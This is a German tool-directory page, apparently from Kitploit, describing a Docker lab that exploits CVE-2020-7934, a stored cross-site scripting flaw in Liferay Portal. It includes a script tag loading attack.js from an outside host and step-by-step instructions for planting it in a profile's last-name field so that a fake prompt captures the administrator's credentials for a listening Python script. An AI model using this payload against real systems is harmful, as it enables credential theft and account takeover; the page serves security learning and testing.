Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
audit-xss-cve-2020-7934 — # Docker-basierter XSS-Exploit für CVE-2020-7934, der das Liferay-Portal angreift. Demonstriert gespeichertes Cross-Site-Scripting über Benutzerprofilfelder, um Admin-Anmeldedaten zu stehlen. | Kitploit
Tools/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

# Docker-basierter XSS-Exploit für CVE-2020-7934, der das Liferay-Portal angreift. Demonstriert gespeichertes Cross-Site-Scripting über Benutzerprofilfelder, um Admin-Anmeldedaten zu stehlen.

Repository anzeigen
45vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE 2020-7934

So führen Sie den CVE aus

Anforderungen

  1. docker

Hinweise

Es ist möglich, das Angriffsskript online zu stellen (mit dem JS-Code) http://yourjavascript.com/ Unser JS-Skript online für den Angriff html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Befehle für die Konfiguration

  1. Gehen Sie zum Hauptordner dieses Projekts
  2. führen Sie "sudo docker-compose up --build" aus
  3. neues Terminal: führen Sie "docker inspect liferay" aus ==> und kopieren Sie den IPAddress-Wert
  4. neues Terminal: führen Sie "python api_attacker.py" aus
  5. öffnen Sie einen Browser und gehen Sie zu "http://IPAddress:8080" ==> Sie sollten das Liferay-Portal als Antwort erhalten
  6. um Container zu stoppen und zu löschen, verwenden Sie "sudo docker-compose rm"

Anweisungen für den Angriff

  1. Registrieren Sie sich in Liferay als Benutzer, melden Sie sich an und treten Sie im Abschnitt "verfügbare Sites" der Site "liferay" bei.
  2. Ändern Sie den "Nachnamen" in einem JS-Skript (direkt () oder über ein "src =" http ... "")
  3. Melden Sie sich als Liferay-Admin an (Benutzername: [email protected], Passwort: test)
  4. Gehen Sie zu den verfügbaren Sites und klicken Sie auf "liferay", die öffentliche Seite dieser Site wird geöffnet.
  5. Gehen Sie zur neuen Seite, ein Menü öffnet sich auf der rechten Seite, klicken Sie auf Mitgliedschaft.
  6. Wählen Sie den in Schritt 1 registrierten Benutzer aus. In diesem Moment wird das Skript ausgeführt. 5.1) Im Skript attack.js fragt die Seite nach den Anmeldeinformationen.
  7. Im Terminal von Schritt 5 (von "Befehle für die Konfiguration") werden Benutzername/Passwort ausgegeben, die in 5.1 eingegeben wurden (vom Admin).
Tool herunterladen